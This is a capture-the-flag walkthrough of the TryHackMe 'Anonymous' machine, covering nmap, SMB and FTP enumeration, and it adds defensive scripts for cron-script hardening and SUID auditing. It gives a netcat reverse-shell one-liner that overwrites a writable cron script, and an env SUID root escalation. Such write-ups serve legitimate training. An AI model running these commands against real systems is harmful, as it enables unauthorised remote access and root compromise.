A step-by-step walkthrough of the TryHackMe Anonymous machine

Network Enumeration

Comprehensive port scanning and service identification using Nmap with advanced scripting techniques.

Nmap Masscan

SMB Analysis

Identifying and enumerating SMB shares, understanding share permissions, and extracting valuable information.

SMBClient Enum4Linux SMBMap

FTP Exploitation

Leveraging anonymous FTP access to discover and analyze file structures, scripts, and logs.

FTP Telnet Netcat

Bash Scripting

Analyzing and modifying shell scripts to create reverse shell payloads for initial access.

Bash Kali Linux

Privilege Escalation

Identifying SUID misconfigurations and exploiting environmental variables for root access.

SUIDEnum LinPEAS LinEnum

Tool Proficiency

Effective use of SMBClient, FTP, netcat, and enumeration scripts to systematically compromise the system.

Linux Kali Linux Bash

Anonymous TryHackMe Writeup

nmap -A -T4 -p- 10.10.153.251 -oA anonymous
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-06 08:29 EST
Warning: 10.10.153.251 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.153.251
Host is up (0.19s latency).
Not shown: 65501 closed tcp ports (conn-refused), 30 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts [NSE: writeable]
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.9.23.51
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8bca21621c2b23fa6bc61fa813fe1c68 (RSA)
|   256 9589a412e2e6ab905d4519ff415f74ce (ECDSA)
|_  256 e12a96a4ea8f688fcc74b8f0287270cd (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 6s, deviation: 1s, median: 5s
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time:
|   date: 2023-02-06T13:43:53
|_  start_date: N/A
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: anonymous
|   NetBIOS computer name: ANONYMOUS\x00
|   Domain name: \x00
|   FQDN: anonymous
|_  System time: 2023-02-06T13:43:53+00:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 854.27 seconds

SMB Enumeration (Port 139/445)

My tool of choice for share enumeration is SMBClient:

┌──(kali㉿kali)-[~/TryHackMe/Machines/Linux/Anonymous]
└─$ smbclient -L 10.10.153.251
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        print$          Disk      Printer Drivers
        pics            Disk      My SMB Share Directory for Pics
        IPC$            IPC       IPC Service (anonymous server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment

        Workgroup            Master
        WORKGROUP            ANONYMOUS

The pics share is the only share that does not require authentication. As denoted by the ($) suffix, the IPC$ and print$ shares require authentication.

Pics Share Enumeration

smb: \> ls
  .                                   D        0  Sun May 17 07:11:34 2020
  ..                                  D        0  Wed May 13 21:59:10 2020
  corgo2.jpg                          N    42663  Mon May 11 20:43:42 2020
  puppos.jpeg                         N   265188  Mon May 11 20:43:42 2020

                20508240 blocks of size 1024. 13306792 blocks available
smb: \> mget *
Get file corgo2.jpg? yes
getting file \corgo2.jpg of size 42663 as corgo2.jpg (35.7 KiloBytes/sec) (average 35.7 KiloBytes/sec)
Get file puppos.jpeg? yes
getting file \puppos.jpeg of size 265188 as puppos.jpeg (86.8 KiloBytes/sec) (average 72.4 KiloBytes/sec)

It shows the presence of two images. Nothing much to go on.

FTP Enumeration

ftp> ls
229 Entering Extended Passive Mode (|||58890|)
150 Here comes the directory listing.
drwxrwxrwx    2 1110     113          4096 Jun 04  2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||119163|)
150 Here comes the directory listing.
-rwxr-xrwx    1 1000     1000          314 Jun 04  2020 clean.sh
-rw-rw-r--    1 1000     1000         5074 Feb 06 13:51 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12  2020 to_do.txt
226 Directory send OK.

The name of the machine is itself a hint that anonymous login is allowed on FTP.

Download all the FTP Files

#!/bin/bash

tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
        echo "Running cleanup script: nothing to delete" >> /var/ftp/scripts/removed_files.log
else
        for LINE in $tmp_files; do
                rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log
        done
fi

The bash script clean.sh is a cleanup script that deletes files from the /tmp folder and then records the date and details of each deleted file in the FTP log (removed_files.log).
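As an added example (this is not the machine's clean.sh and not part of the original writeup), the script below reproduces the cleanup logic with two defensive changes. The original test `[ $tmp_files=0 ]` is a single non-empty word, so it is always true and the removal branch can never run; here it is written as a real comparison. In addition, a pre-flight check refuses to act while the script file itself is group- or world-writable, which is exactly the condition that lets an anonymous FTP user replace its contents before the cron job runs it. The log path and the /tmp target are assumptions carried over from the original script; LOG_FILE and TARGET_DIR can be overridden from the environment so the example runs in a scratch directory.

```shell
#!/bin/sh
# Added example: a hardened rewrite of the cleanup logic, not the clean.sh
# found on the machine. LOG_FILE and TARGET_DIR are assumed from the
# original script and can be overridden from the environment.
LOG_FILE="${LOG_FILE:-/var/ftp/scripts/removed_files.log}"
TARGET_DIR="${TARGET_DIR:-/tmp}"

# Succeed only when the file at $1 has no group or world write bit.
# Uses the ten-character mode column of `ls -ld` (e.g. -rwxr-xr-x):
# character 6 is the group write bit and character 9 the world write bit.
script_is_protected() {
    perms=$(ls -ld -- "$1" | cut -c1-10) || return 1
    case "$perms" in
        ?????w*|????????w*) return 1 ;;
    esac
    return 0
}

# Delete the names listed in $1 (space separated) from TARGET_DIR, log each
# removal with a timestamp, and print the number of files removed.
# The original wrote `[ $tmp_files=0 ]`, one non-empty word, so it was always
# true; the comparison below actually tests the value.
cleanup() {
    tmp_files="$1"
    removed=0
    if [ -z "$tmp_files" ] || [ "$tmp_files" = 0 ]; then
        echo "Running cleanup script: nothing to delete" >> "$LOG_FILE"
    else
        for LINE in $tmp_files; do
            # plain file names only: no slashes, no parent-directory traversal
            case "$LINE" in */*|.|..) continue ;; esac
            if [ -e "$TARGET_DIR/$LINE" ] && rm -rf -- "$TARGET_DIR/$LINE"; then
                echo "$(date) | Removed file $TARGET_DIR/$LINE" >> "$LOG_FILE"
                removed=$((removed + 1))
            fi
        done
    fi
    echo "$removed"
}

# Refuse to act at all while the script file ($1) can be modified by anyone
# other than its owner; otherwise run cleanup on the list in $2.
guarded_cleanup() {
    if ! script_is_protected "$1"; then
        echo "refusing to run: $1 is group- or world-writable" >&2
        return 2
    fi
    cleanup "$2"
}
```

Invoked from cron as `guarded_cleanup /var/ftp/scripts/clean.sh "$tmp_files"`, the job silently stops doing work the moment the script becomes writable by others, which is a far better failure mode than executing whatever was uploaded over anonymous FTP.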

Privilege Escalation

Edit the bash script and replace its contents with a bash reverse shell:

#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 2500 >/tmp/f

Replace the IP and port with your own listening IP and port.

SUID Enumeration

namelessone@anonymous:~$ find / -uid 0 -perm -4000 -type f 2>/dev/null
/usr/bin/env
...

The SUID-root binary /usr/bin/env is exploitable; this matches the GTFOBins entry for env under SUID privilege escalation.
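As an added example, not part of the original writeup, the functions below turn the one-off SUID sweep above into a repeatable defensive audit: they list setuid files below a chosen root and flag those whose name is on a watch list of binaries that GTFOBins documents as abusable when setuid. The watch list is an assumption and deliberately short (env is the entry this machine hinges on). The `-uid 0` filter from the command above is left to the caller as extra find arguments so the functions can be exercised on files the caller owns.

```shell
#!/bin/sh
# Added example (not from the original writeup): a small SUID audit.
# RISKY_SUID_NAMES is an assumed, deliberately short watch list of programs
# that GTFOBins lists as abusable when they carry the setuid bit.
RISKY_SUID_NAMES="env bash sh find vim python perl"

# Print every regular file below $1 that has the setuid bit set, one path per
# line. Further arguments are passed to find, so a real sweep is
# `find_suid_files / -uid 0` to match the command used in the writeup.
find_suid_files() {
    root="$1"
    shift
    find "$root" -perm -4000 -type f "$@" 2>/dev/null
}

# Print the paths from find_suid_files whose basename is on the watch list.
flag_risky_suid() {
    find_suid_files "$@" | while IFS= read -r path; do
        name=${path##*/}
        for risky in $RISKY_SUID_NAMES; do
            if [ "$name" = "$risky" ]; then
                echo "$path"
                break
            fi
        done
    done
}

# Exit status 1 when at least one risky setuid file is present, 0 otherwise,
# so the audit can run from cron or a CI check and fail loudly.
audit_suid() {
    hits=$(flag_risky_suid "$@")
    if [ -n "$hits" ]; then
        echo "$hits"
        return 1
    fi
    return 0
}
```

On this machine `audit_suid / -uid 0` would print /usr/bin/env and exit non-zero; the fix is `chmod u-s /usr/bin/env`, since env has no legitimate reason to run setuid root.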

ENV Privilege Escalation

namelessone@anonymous:~$ /usr/bin/env /bin/bash -p
bash-4.4# id
uid=1000(namelessone) gid=1000(namelessone) euid=0(root) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
bash-4.4# whoami
root

Root is obtained via SUID exploitation.

Contact Information

Email

andrewkorir08@gmail.com

LinkedIn

Andrew Keitany

Phone

+254707981971